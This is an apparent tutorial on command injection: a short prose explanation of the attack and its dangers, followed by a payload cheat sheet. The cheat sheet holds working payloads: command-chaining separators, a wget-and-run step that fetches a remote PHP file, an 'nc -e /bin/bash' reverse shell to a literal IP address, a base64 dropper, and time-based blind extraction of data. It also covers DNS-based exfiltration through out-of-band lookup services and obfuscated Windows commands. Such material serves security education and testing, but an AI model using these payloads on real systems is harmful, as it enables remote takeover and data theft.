The article is dedicated to Command Injection, a type of attack where an attacker can execute arbitrary operating system commands on the server hosting the application. This can lead to complete compromise of the application and all its data. Executing these commands typically allows an attacker to gain unauthorized access or control over the application’s environment and system.
Disclaimer: This material is for informational purposes only. The authors are not responsible for any possible misuse of the information. Knowledge of vulnerabilities is essential to improving software security.
Command Injection is one of the most common and dangerous types of attacks on web applications and servers. In this attack, an attacker has the ability to execute arbitrary operating system commands on the server, which gives him control over the application, its data, and even the entire system.
This type of attack arose along with the development of web technologies, when developers began to integrate system commands to automate tasks on servers. Due to careless processing of user input, vulnerabilities often arise that allow the execution of third-party commands. For example, if an application passes user input directly to the operating system shell without proper validation, an attacker can insert his own command, changing the behavior of the application.
The danger of this type of attack is as follows:
Gaining access to the system. An attacker can gain access to system files, databases, or confidential information.
Complete control over the server. If the attack is successful, the attacker can install malware, modify data, or even use the server for further attacks.
Reduced performance or failure. Executing resource-intensive commands can cause the system to overload or crash.
Financial and reputational losses. Compromise of customer data or corporate information can cause significant losses.
It is important to understand that command injection is not dependent on programming language or platform: any system that executes operating system commands is potentially vulnerable. Protection against such attacks consists of implementing secure coding principles, such as validating and sanitizing input, using parameterized queries, and minimizing privileges.
Command injection is a serious threat that can have catastrophic consequences for system security. Understanding its mechanism and implementing timely protection helps to avoid risks.
#Both Unix and Windows supported ls||id; ls ||id; ls|| id; ls || id # Execute both ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe) ls&&id; ls &&id; ls&& id; ls && id # Execute 2º if 1º finish ok ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º ls %0A id # %0A Execute both (RECOMMENDED) #Only unix supported `ls` # `` $(ls) # $() ls; id # ; Chain commands ls${LS_COLORS:10:1}${IFS}id # Might be useful #Not executed but may be interesting > /var/www/html/out.txt #Try to redirect the output to a file < /etc/passwd #Try to send some input to the command
vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80 vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay
?cmd={payload} ?exec={payload} ?command={payload} ?execute{payload} ?ping={payload} ?query={payload} ?jump={payload} ?code={payload} ?reg={payload} ?do={payload} ?func={payload} ?arg={payload} ?option={payload} ?load={payload} ?process={payload} ?step={payload} ?read={payload} ?function={payload} ?req={payload} ?feature={payload} ?exe={payload} ?module={payload} ?payload={payload} ?run={payload} ?print={payload}
Data extraction: character by character
swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi real 0m5.007s user 0m0.000s sys 0m0.000s swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi real 0m0.002s user 0m0.000s sys 0m0.000s
1. Go to http://dnsbin.zhack.ca/ 2. Execute a simple 'ls' for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)
Online tools to check for DNS-based data theft
dnsbin.zhack.ca
pingb.in
windows:
powershell C:**2\n??e*d.*? # notepad @^p^o^w^e^r^shell c:**32\c*?c.e?e # calc